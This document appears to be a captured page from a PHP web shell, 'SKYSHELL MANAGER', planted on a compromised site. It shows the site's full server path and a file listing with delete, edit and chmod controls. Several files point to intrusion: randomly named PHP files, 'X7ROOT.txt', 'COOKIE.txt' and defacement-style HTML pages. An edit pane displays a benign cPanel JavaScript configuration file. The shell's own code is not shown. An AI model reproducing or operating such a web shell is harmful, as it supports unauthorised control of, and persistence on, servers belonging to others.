📁
SKYSHELL MANAGER
PHP v8.2.30
Create
Create
Path:
root
/
home
/
qooetu
/
costes.qooetu.com
/
Name
Size
Perm
Actions
📁
.well-known
-
0755
🗑️
🏷️
🔒
📁
2e19d9
-
0755
🗑️
🏷️
🔒
📁
6b114
-
0755
🗑️
🏷️
🔒
📁
Modules
-
0755
🗑️
🏷️
🔒
📁
app
-
0755
🗑️
🏷️
🔒
📁
assets
-
0755
🗑️
🏷️
🔒
📁
bootstrap
-
0755
🗑️
🏷️
🔒
📁
cgi-bin
-
0755
🗑️
🏷️
🔒
📁
config
-
0755
🗑️
🏷️
🔒
📁
css
-
0755
🗑️
🏷️
🔒
📁
database
-
0755
🗑️
🏷️
🔒
📁
images
-
0755
🗑️
🏷️
🔒
📁
js
-
0755
🗑️
🏷️
🔒
📁
nbproject
-
0755
🗑️
🏷️
🔒
📁
public
-
0755
🗑️
🏷️
🔒
📁
resources
-
0755
🗑️
🏷️
🔒
📁
routes
-
0755
🗑️
🏷️
🔒
📁
storage
-
0755
🗑️
🏷️
🔒
📁
tests
-
0755
🗑️
🏷️
🔒
📁
uploads
-
0755
🗑️
🏷️
🔒
📁
vendor
-
0755
🗑️
🏷️
🔒
📁
wp-admin
-
0755
🗑️
🏷️
🔒
📁
wp-content
-
0755
🗑️
🏷️
🔒
📁
wp-includes
-
0755
🗑️
🏷️
🔒
📄
.htaccess
0.23 KB
0444
🗑️
🏷️
⬇️
✏️
🔒
📄
COOKIE.txt
0.2 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
X7ROOT.txt
0.27 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
defaults.php
1.29 KB
0444
🗑️
🏷️
⬇️
✏️
🔒
📄
engine.php
0 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
error_log
813.08 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
features.php
11.28 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
googlecfb82e09419fc0f6.html
0.05 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
index.php0
1.56 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
inputs.php
0.12 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
kurd.html
1.07 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
library.php
0 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
min.php
6.83 KB
0444
🗑️
🏷️
⬇️
✏️
🔒
📄
p.php
2.75 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
php.ini
0.04 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
product.php
1.78 KB
0444
🗑️
🏷️
⬇️
✏️
🔒
📄
qpmwztts.php
0.74 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
robots.txt
0.32 KB
0444
🗑️
🏷️
⬇️
✏️
🔒
📄
tovmbkwh.php
0.74 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
tyyffovi.php
0.74 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
veoxv.html
1.23 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
Edit: config.debug.js
/* # cpanel - share/libraries/cjt2/src/config.debug.js # Copyright 2022 cPanel, L.L.C. # All rights reserved. # copyright@cpanel.net http://cpanel.net # This code is subject to the cPanel license. Unauthorized copying is prohibited */ /* WARNING -- removed: `PAGE: false` per cplint. No idea what this may impact! */ /* global module: false, global: true */ /* exported require */ /** * Debug Configuration */ (function() { "use strict"; var require = (function() { /** * Trim trailing slashes to prevent // in paths. * @param {String} url Url to process. * @return {String} Cleaned up url. */ function trimTrailingSlash(url) { if (url) { return url.replace(/\/$/, ""); } return url; } /** * Trim leading slashes to prevent // in paths. * @param {String} url Url to process. * @return {String} Cleaned up url. */ function trimLeadingSlash(url) { if (url) { return url.replace(/^\//, ""); } return url; } var preamble, root, libRoot, isCjtBuild, includeApp, masterPath, shareRoot; var isBrowser = typeof (window) !== "undefined"; if (isBrowser) { // Gets the session token from the url var url = window.location.href.toString(); var parts = url.split("/"); var session = parts[3]; if (session.indexOf("cpsess") !== 0) { session = ""; } // Build the cleaned up paths preamble = parts.slice(0, 6).join("/"); root = trimTrailingSlash(PAGE.THEME_PATH || ""); root = trimTrailingSlash(PAGE.MAGIC) + root; root = trimTrailingSlash(root); libRoot = root + "/libraries"; shareRoot = root + "/shared"; PAGE.APP_PATH = trimLeadingSlash(trimTrailingSlash(PAGE.APP_PATH)); isCjtBuild = false; includeApp = true; masterPath = PAGE.masterPath; } else { preamble = global.BUILD_BASE; root = global.BUILD_ROOT; libRoot = global.BUILD_ROOT; libRoot = global.BUILD_ROOT; shareRoot = global.BUILD_ROOT; isCjtBuild = global.BUILD_CJT; includeApp = global.INCLUDE_APP; masterPath = ""; } var paths = { // AMD Plugins text: libRoot + "/requirejs/plugins/text_2.0.12/text", locale: libRoot + "/cjt2/plugins/locale", shared: shareRoot, // Application Support Libraries bootstrap: libRoot + "/bootstrap/source/dist/js/bootstrap", jquery: libRoot + "/jquery/current/jquery", lodash: libRoot + "/lodash/4.8.2/lodash", moment: libRoot + "/moment/optimized/moment-with-locales", qrcode: libRoot + "/qrcodejs/0.0.1/qrcode", // Angular specific libraries angular: libRoot + "/angularjs/1.4.4/angular", ngRoute: libRoot + "/angularjs/1.4.4/angular-route", ngAnimate: libRoot + "/angularjs/1.4.4/angular-animate", ngSanitize: libRoot + "/angularjs/1.4.4/angular-sanitize", ngAria: libRoot + "/angularjs/1.4.4/angular-aria", uiBootstrap: libRoot + "/angular-ui-bootstrap/source/ui-bootstrap-tpls-1.2.5", "angular-growl": libRoot + "/angular-growl-2/build/angular-growl.min", // Other libraries handlebars: libRoot + "/handlebars/handlebars", "jquery-chosen": libRoot + "/chosen/1.5.1/chosen.jquery", "angular-chosen": libRoot + "/angular-chosen/1.4.0/dist/angular-chosen", "angular-ui-scroll": libRoot + "/angular-ui-scroll/1.6.1/dist/ui-scroll.min", "angular-ui-scroll-grid": libRoot + "/angular-ui-scroll/1.6.1/dist/ui-scroll-grid", "angular-ui-scroll-jqlite": libRoot + "/angular-ui-scroll/1.6.1/dist/ui-scroll-jqlite", ace: libRoot + "/ace-editor/optimized/src-min-noconflict/ace", xterm: libRoot + "/xtermjs/xterm", "xterm/addons/fit/fit": libRoot + "/xtermjs/addons/fit/fit", punycode: libRoot + "/punycodejs/punycode", }; // Application Paths if (includeApp) { paths["app"] = root + "/" + PAGE.APP_PATH; } if (!isCjtBuild) { paths["cjt"] = libRoot + "/cjt2"; } else { paths["cjt"] = "../src"; } if (masterPath) { paths["master"] = root + "/" + masterPath; } function buildUrlArgs(PAGE) { var urlArgs = []; if (PAGE.CACHE_BUST) { urlArgs.push("bust=" + (new Date()).getTime()); } if (PAGE.OPTIMIZED) { urlArgs.push("optimized=1"); } if (PAGE.MODE === "debug") { urlArgs.push("debug=1"); } return urlArgs.join("&"); } var config = { // By default load any module IDs from js/lib baseUrl: preamble, // except, if the module ID starts with "app", // load it from the js/app directory. paths // config is relative to the baseUrl, and // never includes a ".js" extension since // the paths config could be for a directory. paths: paths, shim: { "lodash": { exports: "_" }, "angular": { exports: "angular", deps: ["jquery"] }, "ngRoute": { exports: "ngRoute", deps: ["angular"] }, "ngAnimate": { exports: "ngAnimate", deps: ["angular"] }, "ngSanitize": { exports: "ngSanitize", deps: ["angular"] }, "ngAria": { exports: "ngAria", deps: ["angular"] }, "uiBootstrap": { exports: "uiBootstrap", deps: ["angular"] }, "angular-growl": { exports: "angularGrowl", deps: ["angular"] }, "bootstrap": { deps: ["jquery"] }, "qrcode": { exports: "QRCode" }, "jquery-chosen": { deps: ["jquery"] }, "angular-chosen": { deps: ["angular", "jquery", "jquery-chosen"] }, "angular-ui-scroll": { deps: ["angular", "jquery"] }, "angular-ui-scroll-jqlite": { deps: ["angular"] }, "angular-ui-scroll-grid": { deps: ["angular", "angular-ui-scroll"] }, "handlebars": { exports: "Handlebars" } }, urlArgs: buildUrlArgs(PAGE) }; return config; })(); if (typeof (module) !== "undefined" && module.exports) { // We are in the build environment, so export it via exports module.exports.config = require; } else { // This is runtime so make it a global window.require = require; } })();
Save